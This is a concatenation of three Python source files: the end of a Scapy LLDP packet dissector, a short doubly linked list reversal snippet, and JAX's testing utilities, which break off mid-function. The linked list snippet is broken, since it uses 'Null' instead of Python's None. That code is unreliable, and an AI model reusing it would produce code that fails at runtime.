SUBTYPE_MANAGEMENT_ADDRESS_DISTINGUISHED_NAME = 0x11
SUBTYPE_MANAGEMENT_ADDRESS_AS_NUMBER = 0x12
SUBTYPE_MANAGEMENT_ADDRESS_XTP_OVER_IPV4 = 0x13
SUBTYPE_MANAGEMENT_ADDRESS_XTP_OVER_IPV6 = 0x14
SUBTYPE_MANAGEMENT_ADDRESS_XTP_NATIVE_MODE_XTP = 0x15
SUBTYPE_MANAGEMENT_ADDRESS_FIBER_CHANNEL_WORLD_WIDE_PORT_NAME = 0x16
SUBTYPE_MANAGEMENT_ADDRESS_FIBER_CHANNEL_WORLD_WIDE_NODE_NAME = 0x17
SUBTYPE_MANAGEMENT_ADDRESS_GWID = 0x18
SUBTYPE_MANAGEMENT_ADDRESS_AFI_FOR_L2VPN = 0x19
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_SECTION_ENDPOINT_ID = 0x1A
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_LSP_ENDPOINT_ID = 0x1B
SUBTYPE_MANAGEMENT_ADDRESS_MPLS_TP_PSEUDOWIRE_ENDPOINT_ID = 0x1C
SUBTYPE_MANAGEMENT_ADDRESS_MT_IP_MULTI_TOPOLOGY_IPV4 = 0x1D
SUBTYPE_MANAGEMENT_ADDRESS_MT_IP_MULTI_TOPOLOGY_IPV6 = 0x1E
INTERFACE_NUMBERING_SUBTYPES = {
0x01: 'unknown',
0x02: 'ifIndex',
0x03: 'system port number'
}
SUBTYPE_INTERFACE_NUMBER_UNKNOWN = 0x01
SUBTYPE_INTERFACE_NUMBER_IF_INDEX = 0x02
SUBTYPE_INTERFACE_NUMBER_SYSTEM_PORT_NUMBER = 0x03
'''
Note - calculation of _length field::
_length = 1@_management_address_string_length +
1@management_address_subtype +
management_address.len +
1@interface_numbering_subtype +
4@interface_number +
1@_oid_string_length +
object_id.len
'''
fields_desc = [
BitEnumField('_type', 0x08, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='management_address',
adjust=lambda pkt, x:
8 + len(pkt.management_address) + len(pkt.object_id)),
BitFieldLenField('_management_address_string_length', None, 8,
length_of='management_address',
adjust=lambda pkt, x: len(pkt.management_address) + 1), # noqa: E501
ByteEnumField('management_address_subtype', 0x00,
IANA_ADDRESS_FAMILY_NUMBERS),
XStrLenField('management_address', '',
length_from=lambda pkt: 0
if pkt._management_address_string_length is None else
pkt._management_address_string_length - 1),
ByteEnumField('interface_numbering_subtype',
SUBTYPE_INTERFACE_NUMBER_UNKNOWN,
INTERFACE_NUMBERING_SUBTYPES),
BitField('interface_number', 0, 32),
BitFieldLenField('_oid_string_length', None, 8, length_of='object_id'),
XStrLenField('object_id', '',
length_from=lambda pkt: pkt._oid_string_length),
]
def _check(self):
"""
run layer specific checks
"""
if conf.contribs['LLDP'].strict_mode():
management_address_len = len(self.management_address)
if management_address_len == 0 or management_address_len > 31:
raise LLDPInvalidLengthField(
'management address must be 1..31 characters long - '
'got string of size {}'.format(management_address_len))
class ThreeBytesEnumField(EnumField, ThreeBytesField):
def __init__(self, name, default, enum):
EnumField.__init__(self, name, default, enum, "!I")
class LLDPDUGenericOrganisationSpecific(LLDPDU):
ORG_UNIQUE_CODE_PNO = 0x000ecf
ORG_UNIQUE_CODE_IEEE_802_1 = 0x0080c2
ORG_UNIQUE_CODE_IEEE_802_3 = 0x00120f
ORG_UNIQUE_CODE_TIA_TR_41_MED = 0x0012bb
ORG_UNIQUE_CODE_HYTEC = 0x30b216
ORG_UNIQUE_CODES = {
ORG_UNIQUE_CODE_PNO: "PROFIBUS International (PNO)",
ORG_UNIQUE_CODE_IEEE_802_1: "IEEE 802.1",
ORG_UNIQUE_CODE_IEEE_802_3: "IEEE 802.3",
ORG_UNIQUE_CODE_TIA_TR_41_MED: "TIA TR-41 Committee . Media Endpoint Discovery", # noqa: E501
ORG_UNIQUE_CODE_HYTEC: "Hytec Geraetebau GmbH"
}
fields_desc = [
BitEnumField('_type', 127, 7, LLDPDU.TYPES),
BitFieldLenField('_length', None, 9, length_of='data', adjust=lambda pkt, x: len(pkt.data) + 4), # noqa: E501
ThreeBytesEnumField('org_code', 0, ORG_UNIQUE_CODES),
ByteField('subtype', 0x00),
XStrLenField('data', '',
length_from=lambda pkt: 0 if pkt._length is None else
pkt._length - 4)
]
# 0x09 .. 0x7e is reserved for future standardization and for now treated as Raw() data # noqa: E501
LLDPDU_CLASS_TYPES = {
0x00: LLDPDUEndOfLLDPDU,
0x01: LLDPDUChassisID,
0x02: LLDPDUPortID,
0x03: LLDPDUTimeToLive,
0x04: LLDPDUPortDescription,
0x05: LLDPDUSystemName,
0x06: LLDPDUSystemDescription,
0x07: LLDPDUSystemCapabilities,
0x08: LLDPDUManagementAddress,
127: LLDPDUGenericOrganisationSpecific
}
class LLDPConfiguration(object):
"""
basic configuration for LLDP layer
"""
def __init__(self):
self._strict_mode = True
self.strict_mode_enable()
def strict_mode_enable(self):
"""
enable strict mode and dissector debugging
"""
self._strict_mode = True
def strict_mode_disable(self):
"""
disable strict mode and dissector debugging
"""
self._strict_mode = False
def strict_mode(self):
"""
get current strict mode state
"""
return self._strict_mode
conf.contribs['LLDP'] = LLDPConfiguration()
bind_layers(Ether, LLDPDU, type=LLDP_ETHER_TYPE)
bind_layers(Dot1Q, LLDPDU, type=LLDP_ETHER_TYPE)
|
the-stack_106_22024
|
class DListNode:
def __init__(self, val):
self.val = val
self.prev = self.next = Null
def reverse(self, head):
curr = None
while head:
curr = head
head = curr.next
curr.next = curr.prev
curr.prev = head
return curr
|
the-stack_106_22027
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import inspect
import functools
from functools import partial
import re
import os
import textwrap
from typing import Dict, List, Generator, Sequence, Tuple, Union
import unittest
import warnings
import zlib
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import numpy.random as npr
from jax._src import api
from jax import core
from jax._src import dtypes as _dtypes
from jax import lax
from jax._src.config import flags, bool_env, config
from jax._src.util import prod, unzip2
from jax.tree_util import tree_multimap, tree_all, tree_map, tree_reduce
from jax._src.lib import xla_bridge
from jax._src import dispatch
from jax.interpreters import mlir
from jax.interpreters import xla
from jax.experimental.maps import Mesh
FLAGS = flags.FLAGS
flags.DEFINE_string(
'jax_test_dut', '',
help=
'Describes the device under test in case special consideration is required.'
)
flags.DEFINE_integer(
'num_generated_cases',
int(os.getenv('JAX_NUM_GENERATED_CASES', '10')),
help='Number of generated cases to test')
flags.DEFINE_integer(
'max_cases_sampling_retries',
int(os.getenv('JAX_MAX_CASES_SAMPLING_RETRIES', '100')),
'Number of times a failed test sample should be retried. '
'When an unseen case cannot be generated in this many trials, the '
'sampling process is terminated.'
)
flags.DEFINE_bool(
'jax_skip_slow_tests',
bool_env('JAX_SKIP_SLOW_TESTS', False),
help='Skip tests marked as slow (> 5 sec).'
)
flags.DEFINE_string(
'test_targets', '',
'Regular expression specifying which tests to run, called via re.search on '
'the test name. If empty or unspecified, run all tests.'
)
flags.DEFINE_string(
'exclude_test_targets', '',
'Regular expression specifying which tests NOT to run, called via re.search '
'on the test name. If empty or unspecified, run all tests.'
)
EPS = 1e-4
def _dtype(x):
return (getattr(x, 'dtype', None) or
np.dtype(_dtypes.python_scalar_dtypes.get(type(x), None)) or
np.asarray(x).dtype)
def num_float_bits(dtype):
return _dtypes.finfo(_dtypes.canonicalize_dtype(dtype)).bits
def to_default_dtype(arr):
"""Convert a value to an array with JAX's default dtype.
This is generally used for type conversions of values returned by numpy functions,
to make their dtypes take into account the state of the ``jax_enable_x64`` and
``jax_default_dtype_bits`` flags.
"""
arr = np.asarray(arr)
dtype = _dtypes._default_types.get(arr.dtype.kind)
return arr.astype(_dtypes.canonicalize_dtype(dtype)) if dtype else arr
def with_jax_dtype_defaults(func, use_defaults=True):
"""Return a version of a function with outputs that match JAX's default dtypes.
This is generally used to wrap numpy functions within tests, in order to make
their default output dtypes match those of corresponding JAX functions, taking
into account the state of the ``jax_enable_x64`` and ``jax_default_dtype_bits``
flags.
Args:
use_defaults : whether to convert any given output to the default dtype. May be
a single boolean, in which case it specifies the conversion for all outputs,
or may be a a pytree with the same structure as the function output.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(use_defaults, bool):
return tree_map(to_default_dtype, result) if use_defaults else result
else:
f = lambda arr, use_default: to_default_dtype(arr) if use_default else arr
return tree_map(f, result, use_defaults)
return wrapped
def is_sequence(x):
try:
iter(x)
except TypeError:
return False
else:
return True
_default_tolerance = {
_dtypes.float0: 0,
np.dtype(np.bool_): 0,
np.dtype(np.int8): 0,
np.dtype(np.int16): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0,
np.dtype(np.uint8): 0,
np.dtype(np.uint16): 0,
np.dtype(np.uint32): 0,
np.dtype(np.uint64): 0,
np.dtype(_dtypes.bfloat16): 1e-2,
np.dtype(np.float16): 1e-3,
np.dtype(np.float32): 1e-6,
np.dtype(np.float64): 1e-15,
np.dtype(np.complex64): 1e-6,
np.dtype(np.complex128): 1e-15,
}
def default_tolerance():
if device_under_test() != "tpu":
return _default_tolerance
tol = _default_tolerance.copy()
tol[np.dtype(np.float32)] = 1e-3
tol[np.dtype(np.complex64)] = 1e-3
return tol
default_gradient_tolerance = {
np.dtype(_dtypes.bfloat16): 1e-1,
np.dtype(np.float16): 1e-2,
np.dtype(np.float32): 2e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.complex64): 1e-3,
np.dtype(np.complex128): 1e-5,
}
def _assert_numpy_allclose(a, b, atol=None, rtol=None, err_msg=''):
if a.dtype == b.dtype == _dtypes.float0:
np.testing.assert_array_equal(a, b, err_msg=err_msg)
return
a = a.astype(np.float32) if a.dtype == _dtypes.bfloat16 else a
b = b.astype(np.float32) if b.dtype == _dtypes.bfloat16 else b
kw = {}
if atol: kw["atol"] = atol
if rtol: kw["rtol"] = rtol
with np.errstate(invalid='ignore'):
# TODO(phawkins): surprisingly, assert_allclose sometimes reports invalid
# value errors. It should not do that.
np.testing.assert_allclose(a, b, **kw, err_msg=err_msg)
def tolerance(dtype, tol=None):
tol = {} if tol is None else tol
if not isinstance(tol, dict):
return tol
tol = {np.dtype(key): value for key, value in tol.items()}
dtype = _dtypes.canonicalize_dtype(np.dtype(dtype))
return tol.get(dtype, default_tolerance()[dtype])
def _normalize_tolerance(tol):
tol = tol or 0
if isinstance(tol, dict):
return {np.dtype(k): v for k, v in tol.items()}
else:
return {k: tol for k in _default_tolerance}
def join_tolerance(tol1, tol2):
tol1 = _normalize_tolerance(tol1)
tol2 = _normalize_tolerance(tol2)
out = tol1
for k, v in tol2.items():
out[k] = max(v, tol1.get(k, 0))
return out
def _assert_numpy_close(a, b, atol=None, rtol=None, err_msg=''):
a, b = np.asarray(a), np.asarray(b)
assert a.shape == b.shape
atol = max(tolerance(a.dtype, atol), tolerance(b.dtype, atol))
rtol = max(tolerance(a.dtype, rtol), tolerance(b.dtype, rtol))
_assert_numpy_allclose(a, b, atol=atol * a.size, rtol=rtol * b.size,
err_msg=err_msg)
def check_eq(xs, ys, err_msg=''):
assert_close = partial(_assert_numpy_allclose, err_msg=err_msg)
tree_all(tree_multimap(assert_close, xs, ys))
def check_close(xs, ys, atol=None, rtol=None, err_msg=''):
assert_close = partial(_assert_numpy_close, atol=atol, rtol=rtol,
err_msg=err_msg)
tree_all(tree_multimap(assert_close, xs, ys))
def _check_dtypes_match(xs, ys):
def _assert_dtypes_match(x, y):
if config.x64_enabled:
assert _dtype(x) == _dtype(y)
else:
assert (_dtypes.canonicalize_dtype(_dtype(x)) ==
_dtypes.canonicalize_dtype(_dtype(y)))
tree_all(tree_multimap(_assert_dtypes_match, xs, ys))
def inner_prod(xs, ys):
def contract(x, y):
return np.real(np.dot(np.conj(x).reshape(-1), y.reshape(-1)))
return tree_reduce(np.add, tree_multimap(contract, xs, ys))
def _safe_subtract(x, y, *, dtype):
"""Subtraction that with `inf - inf == 0` semantics."""
with np.errstate(invalid='ignore'):
return np.where(np.equal(x, y), np.array(0, dtype),
np.subtract(x, y, dtype=dtype))
add = partial(tree_multimap, lambda x, y: np.add(x, y, dtype=_dtype(x)))
sub = partial(tree_multimap, lambda x, y: np.subtract(x, y, dtype=_dtype(x)))
safe_sub = partial(tree_multimap,
lambda x, y: _safe_subtract(x, y, dtype=_dtype(x)))
conj = partial(tree_map, lambda x: np.conj(x, dtype=_dtype(x)))
def scalar_mul(xs, a):
def mul(x):
dtype = _dtype(x)
return np.multiply(x, np.array(a, dtype=dtype), dtype=dtype)
return tree_map(mul, xs)
def rand_like(rng, x):
shape = np.shape(x)
dtype = _dtype(x)
randn = lambda: np.asarray(rng.randn(*shape), dtype=dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
return randn() + dtype.type(1.0j) * randn()
else:
return randn()
def numerical_jvp(f, primals, tangents, eps=EPS):
delta = scalar_mul(tangents, eps)
f_pos = f(*add(primals, delta))
f_neg = f(*sub(primals, delta))
return scalar_mul(safe_sub(f_pos, f_neg), 0.5 / eps)
def _merge_tolerance(tol, default):
if tol is None:
return default
if not isinstance(tol, dict):
return tol
out = default.copy()
for k, v in tol.items():
out[np.dtype(k)] = v
return out
def check_jvp(f, f_jvp, args, atol=None, rtol=None, eps=EPS, err_msg=''):
atol = _merge_tolerance(atol, default_gradient_tolerance)
rtol = _merge_tolerance(rtol, default_gradient_tolerance)
rng = np.random.RandomState(0)
tangent = tree_map(partial(rand_like, rng), args)
v_out, t_out = f_jvp(args, tangent)
_check_dtypes_match(v_out, t_out)
v_out_expected = f(*args)
_check_dtypes_match(v_out, v_out_expected)
t_out_expected = numerical_jvp(f, args, tangent, eps=eps)
# In principle we should expect exact equality of v_out and v_out_expected,
# but due to nondeterminism especially on GPU (e.g., due to convolution
# autotuning) we only require "close".
check_close(v_out, v_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} primal' if err_msg else 'primal')
check_close(t_out, t_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} tangent' if err_msg else 'tangent')
def check_vjp(f, f_vjp, args, atol=None, rtol=None, eps=EPS, err_msg=''):
atol = _merge_tolerance(atol, default_gradient_tolerance)
rtol = _merge_tolerance(rtol, default_gradient_tolerance)
_rand_like = partial(rand_like, np.random.RandomState(0))
v_out, vjpfun = f_vjp(*args)
v_out_expected = f(*args)
check_close(v_out, v_out_expected, atol=atol, rtol=rtol,
err_msg=f'{err_msg} primal' if err_msg else 'primal')
tangent = tree_map(_rand_like, args)
tangent_out = numerical_jvp(f, args, tangent, eps=eps)
cotangent = tree_map(_rand_like, v_out)
cotangent_out = conj(vjpfun(conj(cotangent)))
ip = inner_prod(tangent, cotangent_out)
ip_expected = inner_prod(tangent_out, cotangent)
check_close(ip, ip_expected, atol=atol, rtol=rtol,
err_msg=(f'{err_msg} cotangent projection'
if err_msg else 'cotangent projection'))
def check_grads(f, args, order,
modes=("fwd", "rev"), atol=None, rtol=None, eps=None):
"""Check gradients from automatic differentiation against finite differences.
Gradients are only checked in a single randomly chosen direction, which
ensures that the finite difference calculation does not become prohibitively
expensive even for large input/output spaces.
Args:
f: function to check at ``f(*args)``.
args: tuple of argument values.
order: forward and backwards gradients up to this order are checked.
modes: lists of gradient modes to check ('fwd' and/or 'rev').
atol: absolute tolerance for gradient equality.
rtol: relative tolerance for gradient equality.
eps: step size used for finite differences.
Raises:
AssertionError: if gradients do not match.
"""
args = tuple(args)
eps = eps or EPS
_check_jvp = partial(check_jvp, atol=atol, rtol=rtol, eps=eps)
_check_vjp = partial(check_vjp, atol=atol, rtol=rtol, eps=eps)
def _check_grads(f, args, order, err_msg=''):
if "fwd" in modes:
fwd_msg = f'JVP of {err_msg}' if err_msg else 'JVP'
_check_jvp(f, partial(api.jvp, f), args, err_msg=fwd_msg)
if order > 1:
_check_grads(partial(api.jvp, f), (args, args), order - 1, fwd_msg)
if "rev" in modes:
rev_msg = f'VJP of {err_msg}' if err_msg else 'VJP'
_check_vjp(f, partial(api.vjp, f), args, err_msg=rev_msg)
if order > 1:
def f_vjp(*args):
out_primal_py, vjp_py = api.vjp(f, *args)
return vjp_py(out_primal_py)
_check_grads(f_vjp, args, order - 1, rev_msg)
_check_grads(f, args, order)
@contextmanager
def count_device_put():
device_put = dispatch.device_put
count = [0]
def device_put_and_count(*args, **kwargs):
count[0] += 1
return device_put(*args, **kwargs)
dispatch.device_put = device_put_and_count
try:
yield count
finally:
dispatch.device_put = device_put
@contextmanager
def count_primitive_compiles():
dispatch.xla_primitive_callable.cache_clear()
count = [-1]
try:
yield count
finally:
count[0] = dispatch.xla_primitive_callable.cache_info().misses
@contextmanager
def count_jit_and_pmap_compiles():
# No need to clear any caches since we generally jit and pmap fresh callables
# in tests.
xla_jaxpr_subcomp = xla.jaxpr_subcomp
mlir_jaxpr_subcomp = mlir.jaxpr_subcomp
count = [0]
def xla_jaxpr_subcomp_and_count(*args, **kwargs):
count[0] += 1
return xla_jaxpr_subcomp(*args, **kwargs)
def mlir_jaxpr_subcomp_and_count(*args, **kwargs):
count[0] += 1
return mlir_jaxpr_subcomp(*args, **kwargs)
xla.jaxpr_subcomp = xla_jaxpr_subcomp_and_count
mlir.jaxpr_subcomp = mlir_jaxpr_subcomp_and_count
try:
yield count
finally:
xla.jaxpr_subcomp = xla_jaxpr_subcomp
mlir.jaxpr_subcomp = mlir_jaxpr_subcomp
@contextmanager
def assert_num_jit_and_pmap_compilations(times):
with count_jit_and_pmap_compiles() as count:
yield
if count[0] != times:
raise AssertionError(f"Expected exactly {times} XLA compilations, "
f"but executed {count[0]}")
def device_under_test():
return FLAGS.jax_test_dut or xla_bridge.get_backend().platform
def if_device_under_test(device_type: Union[str, Sequence[str]],
if_true, if_false):
"""Chooses `if_true` of `if_false` based on device_under_test."""
if device_under_test() in ([device_type] if isinstance(device_type, str)
else device_type):
return if_true
else:
return if_false
def supported_dtypes():
if device_under_test() == "tpu":
types = {np.bool_, np.int8, np.int16, np.int32, np.uint8, np.uint16,
np.uint32, _dtypes.bfloat16, np.float16, np.float32, np.complex64}
elif device_under_test() == "iree":
types = {np.bool_, np.int8, np.int16, np.int32, np.uint8, np.uint16,
np.uint32, np.float32}
else:
types = {np.bool_, np.int8, np.int16, np.int32, np.int64,
np.uint8, np.uint16, np.uint32, np.uint64,
_dtypes.bfloat16, np.float16, np.float32, np.float64,
np.complex64, np.complex128}
if not config.x64_enabled:
types -= {np.uint64, np.int64, np.float64, np.complex128}
return types
def is_device_rocm():
return xla_bridge.get_backend().platform_version.startswith('rocm')
def is_device_cuda():
return xla_bridge.get_backend().platform_version.startswith('cuda')
def _get_device_tags():
"""returns a set of tags definded for the device under test"""
if is_device_rocm():
device_tags = set([device_under_test(), "rocm"])
elif is_device_cuda():
device_tags = set([device_under_test(), "cuda"])
else:
device_tags = set([device_under_test()])
return device_tags
def skip_on_devices(*disabled_devices):
"""A decorator for test methods to skip the test on certain devices."""
def skip(test_method):
@functools.wraps(test_method)
def test_method_wrapper(self, *args, **kwargs):
device_tags = _get_device_tags()
if device_tags & set(disabled_devices):
test_name = getattr(test_method, '__name__', '[unknown test]')
raise unittest.SkipTest(
f"{test_name} not supported on device with tags {device_tags}.")
return test_method(self, *args, **kwargs)
return test_method_wrapper
return skip
def set_host_platform_device_count(nr_devices: int):
"""Returns a closure that undoes the operation."""
prev_xla_flags = os.getenv("XLA_FLAGS")
flags_str = prev_xla_flags or ""
# Don't override user-specified device count, or other XLA flags.
if "xla_force_host_platform_device_count" not in flags_str:
os.environ["XLA_FLAGS"] = (flags_str +
f" --xla_force_host_platform_device_count={nr_devices}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def undo():
if prev_xla_flags is None:
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = prev_xla_flags
xla_bridge.get_backend.cache_clear()
return undo
def skip_on_flag(flag_name, skip_value):
"""A decorator for test methods to skip the test when flags are set."""
def skip(test_method): # pylint: disable=missing-docstring
@functools.wraps(test_method)
def test_method_wrapper(self, *args, **kwargs):
flag_value = config._read(flag_name)
if flag_value == skip_value:
test_name = getattr(test_method, '__name__', '[unknown test]')
raise unittest.SkipTest(
f"{test_name} not supported when FLAGS.{flag_name} is {flag_value}")
return test_method(self, *args, **kwargs)
return test_method_wrapper
return skip
def format_test_name_suffix(opname, shapes, dtypes):
arg_descriptions = (format_shape_dtype_string(shape, dtype)
for shape, dtype in zip(shapes, dtypes))
return '{}_{}'.format(opname.capitalize(), '_'.join(arg_descriptions))
# We use special symbols, represented as singleton objects, to distinguish
# between NumPy scalars, Python scalars, and 0-D arrays.
class ScalarShape(object):
def __len__(self): return 0
class _NumpyScalar(ScalarShape): pass
class _PythonScalar(ScalarShape): pass
NUMPY_SCALAR_SHAPE = _NumpyScalar()
PYTHON_SCALAR_SHAPE = _PythonScalar()
def _dims_of_shape(shape):
"""Converts `shape` to a tuple of dimensions."""
if type(shape) in (list, tuple):
return shape
elif isinstance(shape, ScalarShape):
return ()
elif np.ndim(shape) == 0:
return (shape,)
else:
raise TypeError(type(shape))
def _cast_to_shape(value, shape, dtype):
"""Casts `value` to the correct Python type for `shape` and `dtype`."""
if shape is NUMPY_SCALAR_SHAPE:
# explicitly cast to NumPy scalar in case `value` is a Python scalar.
return np.dtype(dtype).type(value)
elif shape is PYTHON_SCALAR_SHAPE:
# explicitly cast to Python scalar via https://stackoverflow.com/a/11389998
return np.asarray(value).item()
elif type(shape) in (list, tuple):
assert np.shape(value) == tuple(shape)
return value
elif np.ndim(shape) == 0:
assert np.shape(value) == (shape,)
return value
else:
raise TypeError(type(shape))
def dtype_str(dtype):
return np.dtype(dtype).name
def format_shape_dtype_string(shape, dtype):
if isinstance(shape, np.ndarray):
return f'{dtype_str(dtype)}[{shape}]'
elif isinstance(shape, list):
shape = tuple(shape)
return _format_shape_dtype_string(shape, dtype)
@functools.lru_cache(maxsize=64)
def _format_shape_dtype_string(shape, dtype):
if shape is NUMPY_SCALAR_SHAPE:
return dtype_str(dtype)
elif shape is PYTHON_SCALAR_SHAPE:
return 'py' + dtype_str(dtype)
elif type(shape) is tuple:
shapestr = ','.join(str(dim) for dim in shape)
return '{}[{}]'.format(dtype_str(dtype), shapestr)
elif type(shape) is int:
return '{}[{},]'.format(dtype_str(dtype), shape)
else:
raise TypeError(type(shape))
def _rand_dtype(rand, shape, dtype, scale=1., post=lambda x: x):
"""Produce random values given shape, dtype, scale, and post-processor.
Args:
rand: a function for producing random values of a given shape, e.g. a
bound version of either np.RandomState.randn or np.RandomState.rand.
shape: a shape value as a tuple of positive integers.
dtype: a numpy dtype.
scale: optional, a multiplicative scale for the random values (default 1).
post: optional, a callable for post-processing the random values (default
identity).
Returns:
An ndarray of the given shape and dtype using random values based on a call
to rand but scaled, converted to the appropriate dtype, and post-processed.
"""
if _dtypes.issubdtype(dtype, np.unsignedinteger):
r = lambda: np.asarray(scale * abs(rand(*_dims_of_shape(shape))), dtype)
else:
r = lambda: np.asarray(scale * rand(*_dims_of_shape(shape)), dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
vals = r() + 1.0j * r()
else:
vals = r()
return _cast_to_shape(np.asarray(post(vals), dtype), shape, dtype)
def rand_fullrange(rng, standardize_nans=False):
"""Random numbers that span the full range of available bits."""
def gen(shape, dtype, post=lambda x: x):
dtype = np.dtype(dtype)
size = dtype.itemsize * np.prod(_dims_of_shape(shape))
vals = rng.randint(0, np.iinfo(np.uint8).max, size=size, dtype=np.uint8)
vals = post(vals).view(dtype).reshape(shape)
# Non-standard NaNs cause errors in numpy equality assertions.
if standardize_nans and np.issubdtype(dtype, np.floating):
vals[np.isnan(vals)] = np.nan
return _cast_to_shape(vals, shape, dtype)
return gen
def rand_default(rng, scale=3):
return partial(_rand_dtype, rng.randn, scale=scale)
def rand_nonzero(rng):
post = lambda x: np.where(x == 0, np.array(1, dtype=x.dtype), x)
return partial(_rand_dtype, rng.randn, scale=3, post=post)
def rand_positive(rng):
post = lambda x: x + 1
return partial(_rand_dtype, rng.rand, scale=2, post=post)
def rand_small(rng):
return partial(_rand_dtype, rng.randn, scale=1e-3)
def rand_not_small(rng, offset=10.):
post = lambda x: x + np.where(x > 0, offset, -offset)
return partial(_rand_dtype, rng.randn, scale=3., post=post)
def rand_small_positive(rng):
return partial(_rand_dtype, rng.rand, scale=2e-5)
def rand_uniform(rng, low=0.0, high=1.0):
assert low < high
post = lambda x: x * (high - low) + low
return partial(_rand_dtype, rng.rand, post=post)
def rand_some_equal(rng):
def post(x):
x_ravel = x.ravel()
if len(x_ravel) == 0:
return x
flips = rng.rand(*np.shape(x)) < 0.5
return np.where(flips, x_ravel[0], x)
return partial(_rand_dtype, rng.randn, scale=100., post=post)
def rand_some_inf(rng):
"""Return a random sampler that produces infinities in floating types."""
base_rand = rand_default(rng)
# TODO: Complex numbers are not correctly tested
# If blocks should be switched in order, and relevant tests should be fixed
def rand(shape, dtype):
"""The random sampler function."""
if not _dtypes.issubdtype(dtype, np.floating):
# only float types have inf
return base_rand(shape, dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
dims = _dims_of_shape(shape)
posinf_flips = rng.rand(*dims) < 0.1
neginf_flips = rng.rand(*dims) < 0.1
vals = base_rand(shape, dtype)
vals = np.where(posinf_flips, np.array(np.inf, dtype=dtype), vals)
vals = np.where(neginf_flips, np.array(-np.inf, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_some_nan(rng):
"""Return a random sampler that produces nans in floating types."""
base_rand = rand_default(rng)
def rand(shape, dtype):
"""The random sampler function."""
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
if not _dtypes.issubdtype(dtype, np.floating):
# only float types have inf
return base_rand(shape, dtype)
dims = _dims_of_shape(shape)
r = rng.rand(*dims)
nan_flips = r < 0.1
neg_nan_flips = r < 0.05
vals = base_rand(shape, dtype)
vals = np.where(nan_flips, np.array(np.nan, dtype=dtype), vals)
vals = np.where(neg_nan_flips, np.array(-np.nan, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_some_inf_and_nan(rng):
"""Return a random sampler that produces infinities in floating types."""
base_rand = rand_default(rng)
# TODO: Complex numbers are not correctly tested
# If blocks should be switched in order, and relevant tests should be fixed
def rand(shape, dtype):
"""The random sampler function."""
if not _dtypes.issubdtype(dtype, np.floating):
# only float types have inf
return base_rand(shape, dtype)
if _dtypes.issubdtype(dtype, np.complexfloating):
base_dtype = np.real(np.array(0, dtype=dtype)).dtype
out = (rand(shape, base_dtype) +
np.array(1j, dtype) * rand(shape, base_dtype))
return _cast_to_shape(out, shape, dtype)
dims = _dims_of_shape(shape)
posinf_flips = rng.rand(*dims) < 0.1
neginf_flips = rng.rand(*dims) < 0.1
nan_flips = rng.rand(*dims) < 0.1
vals = base_rand(shape, dtype)
vals = np.where(posinf_flips, np.array(np.inf, dtype=dtype), vals)
vals = np.where(neginf_flips, np.array(-np.inf, dtype=dtype), vals)
vals = np.where(nan_flips, np.array(np.nan, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
# TODO(mattjj): doesn't handle complex types
def rand_some_zero(rng):
"""Return a random sampler that produces some zeros."""
base_rand = rand_default(rng)
def rand(shape, dtype):
"""The random sampler function."""
dims = _dims_of_shape(shape)
zeros = rng.rand(*dims) < 0.5
vals = base_rand(shape, dtype)
vals = np.where(zeros, np.array(0, dtype=dtype), vals)
return _cast_to_shape(np.asarray(vals, dtype=dtype), shape, dtype)
return rand
def rand_int(rng, low=0, high=None):
def fn(shape, dtype):
nonlocal high
if low == 0 and high is None:
if np.issubdtype(dtype, np.integer):
high = np.iinfo(dtype).max
else:
raise ValueError("rand_int requires an explicit `high` value for "
"non-integer types.")
return rng.randint(low, high=high, size=shape, dtype=dtype)
return fn
def rand_unique_int(rng, high=None):
def fn(shape, dtype):
return rng.choice(np.arange(high or prod(shape), dtype=dtype),
size=shape, replace=False)
return fn
def rand_bool(rng):
def generator(shape, dtype):
return _cast_to_shape(rng.rand(*_dims_of_shape(shape)) < 0.5, shape, dtype)
return generator
def check_raises(thunk, err_type, msg):
try:
thunk()
assert False
except err_type as e:
assert str(e).startswith(msg), "\n{}\n\n{}\n".format(e, msg)
def check_raises_regexp(thunk, err_type, pattern):
try:
thunk()
assert False
except err_type as e:
assert re.match(pattern, str(e)), "{}\n\n{}\n".format(e, pattern)
def iter_eqns(jaxpr):
# TODO(necula): why doesn't this search in params?
for eqn in jaxpr.eqns:
yield eqn
for subjaxpr in core.subjaxprs(jaxpr):
yield from iter_eqns(subjaxpr)
def assert_dot_precision(expected_precision, fun, *args):
jaxpr = api.make_jaxpr(fun)(*args)
precisions = [eqn.params['precision'] for eqn in iter_eqns(jaxpr.jaxpr)
if eqn.primitive == lax.dot_general_p]
for precision in precisions:
